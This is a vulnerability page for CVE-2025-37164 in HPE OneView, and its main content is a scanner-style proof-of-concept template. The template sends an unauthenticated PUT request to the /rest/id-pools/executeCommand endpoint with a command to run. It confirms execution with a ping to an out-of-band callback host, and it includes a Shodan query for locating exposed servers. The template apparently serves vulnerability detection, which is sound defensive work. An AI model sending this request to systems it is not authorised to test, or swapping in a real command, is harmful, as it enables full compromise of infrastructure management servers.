CVE-2025-37164: HPE OneView - Remote Code Execution

2026-01-08 HPE OneView PoC Public

Description

HPE OneView contains a remote code execution vulnerability, letting remote attackers execute arbitrary code.

PoC

id: CVE-2025-37164

info:
  name: HPE OneView - Remote Code Execution
  author: DhiyaneshDk,garciaizcoa
  severity: critical
  description: |
    HPE OneView contains a remote code execution vulnerability, letting remote attackers execute arbitrary code.
  impact: |
    Remote attackers can execute arbitrary code, potentially leading to full system compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"HPE" html:"OneView"
  tags: cve,cve2025,hpe,oneview,rce,vkev,kev,vuln

http:
  - raw:
      - |
        GET /rest/version HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /rest/id-pools/executeCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-API-Version: {{apiversion}}
        Accept-Encoding: gzip
        {
        "cmd":"ping -c 2 {{interactsh-url}}",
        "result":0
        }

    extractors:
      - type: json
        part: body
        name: apiversion
        internal: true
        json:
          - '.currentVersion'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ExecutableCommand"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d4d76e6ea764160c57c8c577b052173fca1efa600f913dfd7e86b83a864a84ff022020c39ce787dd94df81fa7debb1edabe9ebc7e2abfcd12dd77331f0530ceddad2:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities